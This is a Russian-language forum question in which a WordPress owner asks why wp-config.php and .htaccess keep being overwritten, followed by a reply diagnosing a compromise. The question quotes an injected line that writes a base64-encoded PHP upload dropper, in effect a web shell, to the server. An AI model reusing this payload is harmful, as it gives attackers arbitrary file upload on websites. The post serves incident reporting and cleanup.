Конфигурационные файлы htaccess и wordpress регулярно перезаписываются - PullRequest
Новая
       0

Конфигурационные файлы htaccess и wordpress регулярно перезаписываются

0 голосов
/ 08 октября 2019

У меня есть сайт WordPress (v5.2.3), и время от времени (возможно, ежемесячно) файлы wp-config.php и .htaccess перезаписываются неверной информацией.

Это приводит к двум проблемам- сначала детали доступа к БД в wp-config изменяются на что-то, что не работает, а затем возможность доступа к моим постоянным ссылкам после ссылки теряется в результате потери информации из htaccess.

После перезаписи мой файл wp-config заполнен примерно такими строками: 

file_put_contents("wp-remote-upload.php", base64_decode('PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRklMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYikiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg=='));

В моем файле wp-config столько строк, что его размер составляет около 800 КБ.

Плагины, которые я использую на своем сайте WordPress:

  • Akismet Anti-Spam [v4.0.1 от Automattic]
  • Контактная форма 7 [v4.9.2 by Takayuki Miyoshi]
  • Дубликатор [v1.2.3 by Snap Creek]
  • Google Analytics для WordPress [v7.7.1 by MonsterInsights]
  • Hello Dolly [v1.6 by Matt Mullenweg]
  • Ограничить попытки входа в систему [v1.7.1 от Johan Eenfeldt]
  • Слайдер с логотипом [v1.4. 7 от EnigmaWeb]
  • Расширенный виджет последних сообщений [v0.9.9.7 от Satrya]
  • Squelch Tabs и Accordions Shortcodes [v0.4.1 от Matt Lowe]
  • WordPress Importer[v0.6.3 by wordpressdotorg]
  • Yoast SEO [v5.9.1 от Team Yoast]

Используя мою FTP-программу, я попытался изменить разрешения на wp-config.php и .htaccess файлы, поэтому они не могут быть записаны - однако мои попытки изменить эти значения не привели к изменениям. Я предполагаю, что у меня нет возможности изменять права доступа к файлам.

Как мне предотвратить перезапись этих файлов?

Или как узнать, что является причиной измененияэти файлы?

1 Ответ

1 голос
/ 23 октября 2019

Похоже, ваша система была взломана / взломана.

Предложите начать с поиска в Google, что делать в таком случае, есть много ресурсов, которые охватывают основы.

В идеале,вам, вероятно, следует удалить все основные папки WP и плагины и снова загрузить файлы из «чистой» системы (чтобы избежать того, что другие файлы, которые могли быть вставлены в вашу систему, все же могут быть доступны злоумышленнику извне.)

Добро пожаловать на сайт PullRequest, где вы можете задавать вопросы и получать ответы от других членов сообщества.

Нет похожих вопросов

...